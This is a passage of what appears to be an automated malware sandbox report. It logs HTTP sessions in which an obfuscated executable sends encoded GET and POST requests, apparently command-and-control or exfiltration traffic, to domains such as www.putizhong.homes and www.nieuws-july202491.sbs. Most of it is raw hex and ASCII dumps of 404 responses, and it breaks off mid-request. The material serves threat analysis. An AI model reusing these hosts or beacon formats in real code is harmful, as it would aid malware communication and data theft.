                                                                                                                                                                                                                                              Data Ascii: 7Bohe=b40V17h4HrXyzd2xgjS5UoOY02uW4mhOEKz2JnqH8Pi6097W+qaWHOoOIDgWR34bbs3jLKz322+OFwSZkguTQ2CcqLyMThunK0EnxsEE46VF1tFZIN1it/UayFOGpinPD/A0tFlcLm7FuuJcL0vjIqNthmswtSu44aFptObgLHatzJqE2MT0n5jF2Ek7HIb9KPXWNJ3uhyY8IQAGN4B7z3P8hZ3F51ZKM4JGfYH/oyLHT1295P+W2dj2XZTECjzHjyUjT3pTWDwFhwk9dZb6r3hAUBSU7LlpDAVvAbqO0on7TtXuby3IUQxmQnuI9mwuHUuMK0q+xqQDU0bw9WF8qv2eUO1MZb98zxuySq16Y855wn+PGmqFXamEGgQNGKpG3si/VUwQBAcJiRAVdxa6z++E8ePi6BKSxwZIUWDdEqHNy1y99tJiwgrDOxN8nqnUEBxv1zLi59KXkTsxHsFl5NPO/n0MuIAhHSSbYSxZSVxFcW9cydJ5EKKKzZRvMH7PBJeSzSiFTwpQOb0Y3Fk/OmaMLtW25vjR4DWHhsdGgyTUje/iD3VydqeEqPzpKFml6iO11c0zxw/uhw8Lotcgihe7o438IoHQSWEV9vvVKeeX1Sn/+Qnt7oyOuOTPfRPbU02v9/90O18prZLwrdQBzoj2VjQqVQJWWxh3y9Xg/Cq2sV08tHAqrYmPrbV/AjbCH+GtC2tEh5RTESbmUk5vIaZcEg76FJwW/bygCnubhnMsjtV5isIkVNesmIsGWudCTuI6hJqvsd5qHITnxTt2TyqHKxURv0E42Blx9SJxPCyUq6pPOMgO6Hd70b4juMo5lMw3km/zRbN4mqynMW3I+rpYp9qQIfPq02vyd8MOG1jc5dm+888P49rBi/D4yxKCdXN4IkZmsJtmmump1OVXZrO2QhP/eBQqUvsyVUk3hJYrigkuhdpqsVIzk4Iv/qqNZRhuJOQyzdi/YsLYMPhhCHM2Vke2LOm0WpMA4xLtnkkDDq [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:55.799773932 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:55 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 1353ZJvLRMUhqCV's=pB<w?qKvm( o=|3q+{XV)w]vtOv,"fv?B0GV]nyyG=56jZ:UMh/0K'wRUX7!rV&Y:s*^o/^VL?{f]m7n*/L-B/?.+0@{?{T`+1J`YiG~LgK{?uMSap;kWa~g[<6.83Fnwzf>v=%ZqM\[My}zze/meeVu7/y6AVYfN"{fWiKK=0}+nf <|#5uWi~?ulriocWRrd~"+7)o|Gp++S'@[YUeM^_WXBGWxGV^5^Y}q+|g|qW&0zDP7q#C6=-L/1euI+=SwU`^Wo-/z#.6F-H~%Y}i,O9 A%?ZYIZufsoD G8~OI{tmH75>Z#P:{}>Lnn!AOl^:?Ww'
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:55.799840927 CEST1236INData Raw: 4a e0 6f 66 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 08 a4 2f 86 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 95 97 67 e5 25 43 3d 0c 0a 37 06 b1 ae b9 71 c0 7e 4e 1f b1 80 ff b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7e ba 20 fb d9 af df cf 7b 63 bf 5f 71 cb
                                                                                                                                                                                                                                              Data Ascii: JofxoO/6g%C=7q~N t7}cU~ {c_qY+~7/CQOEK{?zvGY?U)g:$?*d4^}oa'CFXx!g9iY\W8a*~+z`U$
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:55.799894094 CEST424INData Raw: b8 2c 71 6a 01 8b 46 1b 2e 3b 4d f0 5d 7e 6e 27 96 24 52 b6 2d 68 ac d3 e9 ae 61 a6 93 5c 9d 49 8c ce 89 93 ae 45 ed 60 16 32 74 96 44 67 bc 23 f0 18 4a eb ed 34 d9 06 91 5a 22 e6 c8 18 1b c2 c6 1d 8f b1 04 ad f6 b1 ce f0 c1 5c a4 a2 51 5a 2f 78
                                                                                                                                                                                                                                              Data Ascii: ,qjF.;M]~n'$R-ha\IE`2tDg#J4Z"\QZ/x:7+Ne4]f&cK}6<;U?Zse,}\]lZ|t: G;n8cni5HOp,s)jf(6rfZ&;pFM=:rRy%;iJ^nCeST jF
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:55.799927950 CEST1236INData Raw: ea e7 98 5d 4a a7 90 da 43 8b 1d c8 36 ab 61 78 2c 44 42 4d 6b 39 f6 c8 6c c3 5b 73 92 1e 0e 47 aa 3a 47 16 72 b1 3e 60 55 b8 f5 ec 49 1a 20 81 22 e6 06 bf 99 1e 12 86 76 31 8b 1a ea 78 2b 75 61 16 f2 85 96 60 69 1d 38 a4 aa b1 34 29 b6 6b 8d de
                                                                                                                                                                                                                                              Data Ascii: ]JC6ax,DBMk9l[sG:Gr>`UI "v1x+ua`i84)kBV*'Ig9v.&$5Ql1rMRNs^-Tu+^9lZ9]e9:h+q8& Brh%v>qaa;u
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:55.800009012 CEST1107INData Raw: ad bb 22 c9 dd 78 37 0a 76 1a c7 69 67 a7 15 f6 f0 90 c3 82 c3 01 14 fd 70 c9 1a 9e 50 59 94 8f 90 e5 ee 41 c2 74 48 62 34 1c b7 8a e1 c9 64 be 67 6c c4 87 66 f3 70 6e 84 72 41 15 44 83 ee 8b c6 b1 2a f3 9c a3 a3 f5 8a 5d 7a fb 3c 97 c2 29 37 0a
                                                                                                                                                                                                                                              Data Ascii: "x7vigpPYAtHb4dglfpnrAD*]z<)77&=d&-Q;k8C,v)uEMUz?Sjl?ea0@s^)TY^?gtm(@a1D6#6u@7Vk{i<vTIdlbk$


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.549908162.0.215.33802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:57.635550976 CEST491OUTGET /4bpc/?7Bohe=W6c12MBAM7+Q3p2I42CNcaaX4meOt2NlPYb0dUqqy/7eqOW0wKa7H8cBCmolVGR7OaXpdOvS7kWyFQKJ7xuZambhzJ6Jbz/iDls78L0zlt4s48FcRMJ2uoIWwWqypjO6Yg==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289444923 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:58 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 32 37 38 46 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 278F<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289510012 CEST1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                                                                                                                                                                              Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289562941 CEST1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289597988 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289649010 CEST848INData Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                                                                                                                                                                                              Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289683104 CEST1236INData Raw: 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73
                                                                                                                                                                                                                                              Data Ascii: chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPe
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289716959 CEST1236INData Raw: 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55
                                                                                                                                                                                                                                              Data Ascii: us8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289750099 CEST1236INData Raw: 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67 67 67 3d 3d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: XteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; } .status-reason
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.289788008 CEST857INData Raw: 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: class="info-image" /> <div class="info-heading"> www.nieuws-july202491.sbs/cp_errordocument.shtml (port 80) </div> </li>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.549940154.7.176.67802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.374195099 CEST749OUTPOST /oacu/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Origin: http://www.putizhong.homes
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.putizhong.homes/oacu/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 64 77 32 6c 54 4a 4e 43 48 68 69 6c 46 4a 4b 2b 61 39 4e 6d 6d 35 65 7a 30 71 59 66 67 4d 65 37 69 78 54 70 36 4a 30 45 4e 4a 6d 37 74 36 52 6f 54 66 79 6f 46 79 48 72 51 66 53 41 49 31 45 43 6b 46 71 6e 71 46 50 75 6a 66 31 31 4f 36 59 47 4c 56 68 4d 2f 4f 69 6c 49 4c 47 74 6c 35 37 62 32 63 43 63 79 78 74 6c 51 5a 4d 33 44 45 55 49 4e 62 37 6d 61 63 73 48 46 5a 6b 36 34 43 4d 31 70 42 43 65 6f 78 2f 74 37 73 4f 47 4c 6c 63 72 54 79 74 4d 70 6d 30 52 71 70 42 54 6f 58 71 51 68 76 55 57 36 6c 6b 58 5a 6d 68 58 74 2f 34 31 69 68 64 4e 57 35 72 32 61 77 73 56 53 77 44 54 42 6b 46 62 38 52 67 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=dw2lTJNCHhilFJK+a9Nmm5ez0qYfgMe7ixTp6J0ENJm7t6RoTfyoFyHrQfSAI1ECkFqnqFPujf11O6YGLVhM/OilILGtl57b2cCcyxtlQZM3DEUINb7macsHFZk64CM1pBCeox/t7sOGLlcrTytMpm0RqpBToXqQhvUW6lkXZmhXt/41ihdNW5r2awsVSwDTBkFb8Rg=
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:04.033938885 CEST685INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.549956154.7.176.67802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.053886890 CEST769OUTPOST /oacu/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Origin: http://www.putizhong.homes
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.putizhong.homes/oacu/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 64 77 32 6c 54 4a 4e 43 48 68 69 6c 4b 49 61 2b 5a 61 68 6d 33 70 65 73 78 71 59 66 75 73 65 67 69 78 58 70 36 49 41 75 4e 62 79 37 74 59 4a 6f 53 65 79 6f 45 79 48 72 62 2f 53 2f 51 56 45 5a 6b 46 6e 61 71 45 6a 75 6a 62 56 31 4f 2f 30 47 4c 69 64 50 35 65 69 6a 41 72 47 76 72 5a 37 62 32 63 43 63 79 78 35 62 51 66 6b 33 44 30 45 49 4d 36 37 6c 54 38 73 45 54 4a 6b 36 7a 69 4d 78 70 42 43 38 6f 77 54 4c 37 75 47 47 4c 6c 4d 72 53 67 46 50 36 47 30 58 67 4a 41 39 37 58 62 70 68 39 4e 62 31 55 45 65 45 51 52 38 6c 70 56 66 34 44 56 6c 46 5a 48 4f 4b 6a 6b 69 44 41 69 36 62 48 56 72 69 47 31 62 46 4f 49 44 78 51 79 79 70 56 50 53 31 6b 44 75 4b 74 44 5a
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=dw2lTJNCHhilKIa+Zahm3pesxqYfusegixXp6IAuNby7tYJoSeyoEyHrb/S/QVEZkFnaqEjujbV1O/0GLidP5eijArGvrZ7b2cCcyx5bQfk3D0EIM67lT8sETJk6ziMxpBC8owTL7uGGLlMrSgFP6G0XgJA97Xbph9Nb1UEeEQR8lpVf4DVlFZHOKjkiDAi6bHVriG1bFOIDxQyypVPS1kDuKtDZ
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.669924021 CEST685INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.549972154.7.176.67802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:08.641904116 CEST1786OUTPOST /oacu/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Origin: http://www.putizhong.homes
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
